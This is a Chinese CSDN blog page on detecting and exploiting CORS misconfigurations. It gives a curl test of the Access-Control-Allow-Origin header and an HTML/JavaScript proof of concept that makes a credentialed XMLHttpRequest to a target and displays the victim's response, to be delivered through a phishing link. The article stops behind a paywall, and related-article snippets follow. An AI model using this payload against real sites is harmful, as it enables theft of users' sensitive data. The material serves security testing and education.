CORS漏洞利用检测和利用方式

最新推荐文章于 2024-09-09 12:46:52 发布
最新推荐文章于 2024-09-09 12:46:52 发布
阅读量5.8k 收藏 8
点赞数 1
文章标签: php javascript ViewUI
原文链接:http://www.cnblogs.com/junsec/p/11221943.html
版权
CORS(跨域资源共享)是一种HTML5新特性,可能导致安全问题。检测方法包括使用curl检查Access-Control-Allow-Origin字段,或通过Burp Suite分析响应。漏洞利用可能涉及CSRF,如创建钓鱼链接窃取用户数据。示例代码演示了如何利用XMLHttpRequest进行攻击。当Access-Control-Allow-Origin设为null,表示允许任何域。结合XSS漏洞,可以读取HTTP-only cookie。批量检测工具如CORScanner可用于自动化检测。
摘要由CSDN通过智能技术生成

  CORS全称Cross-Origin Resource Sharing, 跨域资源共享,是HTML5的一个新特性,已被所有浏览器支持,不同于古老的jsonp只能get请求。

检测方式:

  1.curl访问网站  

  curl https://www.huasec.com -H "Origin: https://test.com" -I

  检查返回包的 Access-Control-Allow-Origin 字段是否为https://test.com

  2.burpsuite发送请求包,查看返回包

  

  tips:Access-Control-Allow-Origin的值,当其为null、意味着信任任何域。

漏洞利用:

  1.同于csrf跨站请求伪造,发送钓鱼链接,读取用户敏感数据。

  poc:

<html>
<body>
<center>
<h2>CORS POC Exploit</h2>
<h3>Extract SID</h3>

<div id="demo">
<button type="button" οnclick="cors()">Exploit</button>
</div>

<script>
function cors() {
  var xhttp = new XMLHttpRequest();
  xhttp.onreadystatechange = function() {
    if (this.readyState == 4 && this.status == 200) {
    document.getElementById("demo").innerHTML = alert(this.responseText);
    }
  };
  xhttp.open("GET", "https://target.com/info/", true);
  xhttp.withCredentials = true;
  xhttp.send();
}
</script>
</body>
</html>

  用户点击button弹出响应信息

document.getElementById("demo").innerHTML = alert(this.responseText);

 上面代码只是弹出响应信息,你还可以获取cookie,针对http-only js代码无法读取的情况:

  




                

        

        




    

  


        

            

                    
                      最低0.47元/天 解锁文章
                        
                    
            

        

    

      

        

            

              
                
                  san.hang
                
              
            

            

                关注
              
            

        

        

          
      

      









                



	

		

			

				
					
CORS漏洞的利用方式的学习(精)

				
			

			

				

					墨痕诉清风的博客
				

				

					10-06
					
					4315
					
				

			

		

		

			
				
返回信息主体是用户敏感信息,需注意的是返回的Access-Control-Allow-Origin是攻击者服务器,这意味着系统存在CORS配置错误。如果支持可以使用iframe跨域请求,绕过。修改一下reqListener()函数为。同理结合上面代码,发送到你的服务器。同上,判断是否支持null。.....................................................................

			
		

	



                

            
              



	

		

			

				
					
生命在于学习——Cors漏洞

				
			

			

				

					易水哲的博客
				

				

					09-05
					
					2525
					
				

			

		

		

			
				
Cors漏洞的学习笔记记录。

			
		

	



              


  
              

                


	

		

			

				
					
CORS跨域资源共享漏洞的复现、分析、利用及修复过程

				
			

			

				

					qq_50854662的博客
				

				

					01-04
					
					6209
					
				

			

		

		

			
				
CORS跨域资源共享漏洞的复现、分析、利用及修复过程

			
		

	





	

		

			

				
					
跨域(Cross-Origin)问题概述与后端解决方案(CORS(跨域资源共享)、JSONP(JSON with Padding)、代理服务器)

					
最新发布

				
			

			

				

					项目git同名HuYaochao,未入职
				

				

					09-09
					
					1412
					
				

			

		

		

			
				
跨域的后端解决方案(CORS(跨域资源共享)、JSONP(JSON with Padding)、代理服务器)的代码示例

			
		

	



		

			
		



	

		

			

				
					
漏洞分析 | CORS讲解与实战利用

				
			

			

				

					zkaqlaoniao的博客
				

				

					04-17
					
					1907
					
				

			

		

		

			
				
CORS,跨域资源共享(Cross-origin resource sharing),这种机制通过添加HTTP字段的方式规定服务器资源允许被哪些域访问(Access-Control-Allow-Origin)、请求中是否允许发送cookie(Access-Control-Allow-Credentials)、哪些请求类型是被允许的(Access-Control-Request-Method)等等。环境搭建、HTML,PHP,MySQL基础学习,信息收集,SQL注入,XSS,CSRF,暴力破解等等。

			
		

	





	

		

			

				
					
CORS跨域资源共享漏洞复现——详细利用方法,漏洞危害最大化

				
			

			

				

					
				

				

					06-15
					
					5288
					
				

			

		

		

			
				
CORS跨域资源共享漏洞,漏洞复现,cors利用方式以及让危害最大化。

			
		

	





	

		

			

				
					
Cors漏洞详解

				
			

			

				

					Askshhbs的博客
				

				

					04-26
					
					9911
					
				

			

		

		

			
				
Cors介绍

Cors全称"跨域资源共享"(Cross-origin resource sharing),Cors的出现是用来弥补SOP(同源策略)的不足。在当时SOP有些限制了网页的业务需求,不能够使不同域的网页互相访问,因此提出了Cors:用于绕过SOP(同源策略)来实现跨域资源访问的一种技术。

Cors漏洞就是攻击者利用Cors技术来获取用户的敏感数据,从而导致用户敏感信息泄露。

漏洞原理

Cors请求可分为两类,简单请求和非简单请求。所谓简单请求,就是请求方式为GET,POST,HEAD这三

			
		

	





	

		

			

				
					
用于检测HTTP请求头缺失和CORS跨域漏洞的工具

				
			

			

				

					07-02
				

			

		

		

			
				
CORS配置错误可能导致安全漏洞,如未授权的数据访问或攻击者利用跨站请求伪造(CSRF)攻击。  工具的使用主要包括以下几个关键知识点:  1. **HTTP请求头检查**:  - **Content-Type**:检查是否正确指定了请求体...

			
		

	





	

		

			

				
					
HTTP请求头与CORS漏洞检测工具的介绍与应用

				
			

			

				

					
				

			

		

		

			
				
 - CORS漏洞通常发生在服务器响应中的“Access-Control-Allow-Origin”和“Access-Control-Allow-Methods”等头部设置不当,或者使用了通配符"*"导致不加区分地允许任何域的访问。  5. 检测工具的使用和作用:  - 一...

			
		

	





	

		

			

				
					
CORS漏洞原理分析

				
			

			

				

					m0_38103658的博客
				

				

					10-24
					
					5643
					
				

			

		

		

			
				
CORS跨域漏洞原理分析

CORS全称为Cross-Origin Resource Sharing即跨域资源共享,用于绕过SOP(同源策略)来实现跨域资源访问的一种技术。而CORS漏洞则是利用CORS技术窃取用户敏感数据。以往与CORS漏洞类似的JSONP劫持虽然已经出现了很多年,但由于部分厂商对此不够重视导致其仍在不断发展和扩散。


美创安全实验室近期监控到全国各地类似于JSONP劫持或CO...

			
		

	





	

		

			

				
					
CORS-POC-Generator:Web脚本,使用HTML CSS和JS生成CORS漏洞的POC

				
			

			

				

					04-07
				

			

		

		

			
				
CORS-POC生成器
Web脚本使用HTML CSS和JS生成CORS漏洞的POC。
 输入URL,如果您看到带有JSON数据的警报,则单击“生成”,然后利用它的可利用性,否则找到另一个端点。
安装
克隆回购文件并运行索引文件吧!
 或实时生成:  :

			
		

	





	

		

			

				
					
CORS漏洞

				
			

			

				

					秋水的博客
				

				

					09-20
					
					6976
					
				

			

		

		

			
				
CORS简介

什么是CORSCORS是一个w3c标准、全称是"跨域资源共享"(Cross-origin resource sharing)

因为出于安全的考虑, 浏览器不允许Ajax调用当前源之外的资源.,即浏览器的同源策略

但一个请求url的协议、域名、端口三者之间任意一个与当前页面不同即为跨域、它允许阅览器向跨源服务器发送XMLHttpRequest请求,从而克服AJAX只能同源...

			
		

	





	

		

			

				
					
【Web漏洞】CORS跨域资源共享漏洞

				
			

			

				

					Butterfly0011的博客
				

				

					03-12
					
					4414
					
				

			

		

		

			
				
文章目录CORS跨域资源共享简单跨域请求非简单请求CORS的安全问题CORS漏洞的利用
有关于浏览器的同源策略和如何跨域获取资源,传送门 -->浏览器同源策略和跨域的实现方法
同源策略(SOP)限制了应用程序之间的信息共享,并且仅允许在托管应用程序的域内共享。这有效防止了系统机密信息的泄露。但与此同时,也带来了另外的问题。随着Web应用程序和微服务使用的日益增长,出于实用目的往往需要将信息从...

			
		

	





	

		

			

				
					
常见的Web漏洞——CORS

				
			

			

				

					江左盟的博客
				

				

					06-05
					
					1948
					
				

			

		

		

			
				
渗透做了多年的朋友都知道,大洞小洞都是漏洞。因此也学习、沉淀一下以前没重视的漏洞。CORS的漏洞原理、检测利用方法。

			
		

	





	

		

			

				
					
cors漏洞 复现_CORS的进阶利用

				
			

			

				

					weixin_33454080的博客
				

				

					02-06
					
					1272
					
				

			

		

		

			
				
简介主要看了Corben Leo的Advanced CORS Exploitation Techniques这篇文章,对这篇文章的一个翻译吧,收获良多,复现一下cors漏洞的进阶利用。直入正题。 CORS介绍这里就借OWASP的关于CORS的介绍。CORS stands for Cross-Origin Resource Sharing.Is an feature offering the pos...

			
		

	





	

		

			

				
					
CORS原理及漏洞利用

				
			

			

				

					weixin_50464560的博客
				

				

					10-01
					
					1628
					
				

			

		

		

			
				
转载至https://threezh1.com/2020/02/19/CORS%E5%8E%9F%E7%90%86%E5%8F%8A%E5%88%A9%E7%94%A8%E6%95%B4%E7%90%86/

刚入门的时候也学习过CORS,那个时候的对寻找漏洞的标准是:
1修改`Origin:`,使得返回的HTTP字段中的`Access-Control-Allow-Origin: `出现你所输入的值,表明此网站存在CSOR漏洞
原理、利用、绕过都没有进一步了解。这次趁着实习的机会,好好的将CORS相关知识总

			
		

	





	

		

			

				
					
漏洞原理 | CORS跨域学习篇

				
			

			

				

					2301_80127209的博客
				

				

					03-13
					
					911
					
				

			

		

		

			
				
Cors允许浏览器向跨域服务器发出XmlHttpRequest请求,COSRS和JSONP的区别:CORS是JSONP的升级版,JSONP只能通过get方式请求,CORS支持get,post,head请求。从而证明了是存在cors跨域漏洞的。(1)不要配置”Access-Control-Allow-Origin”为通配符”*”,而且更重要的是,要严格校验来自请求数据数据包中的”Origin”的值。环境搭建、HTML,PHP,MySQL基础学习,信息收集,SQL注入,XSS,CSRF,暴力破解等等。

			
		

	



              




          




        



    





    



      

      

        
      

      





	

		评论	
	

	
	




  

    

      添加红包
      
    

    

      

        
        

          
          
        

        
请填写红包祝福语或标题

      

      

        
        

          
          
        

        
红包个数最小为10个

      

      

        
        

          
          
        

        
红包金额最低5元

      

      

        
        

          当前余额3.43前往充值 >
        

      

      

        

          需支付:10.00

        
        
      

    

  





  

    
    
  

  

    
    
  








  

    

      

        

          

            
            
成就一亿技术人!

          

          

        

        

          

          

            领取后你会自动成为博主和红包主的粉丝
            规则
          

        

      

      

        

          

            
              
            
            

              
hope_wisdom
 发出的红包
            

          

        

        

          

          

          

        

      

    

    

  



      
      

      
实付

      
使用余额支付

      

        

          

            
            点击重新获取
          

        

        
扫码支付

      

      

        
          
            
          
          
        
      

      

        
        钱包余额
          0
          

            
            

              

                
抵扣说明:

                
 1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
 2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

              

            

          

      

      余额充值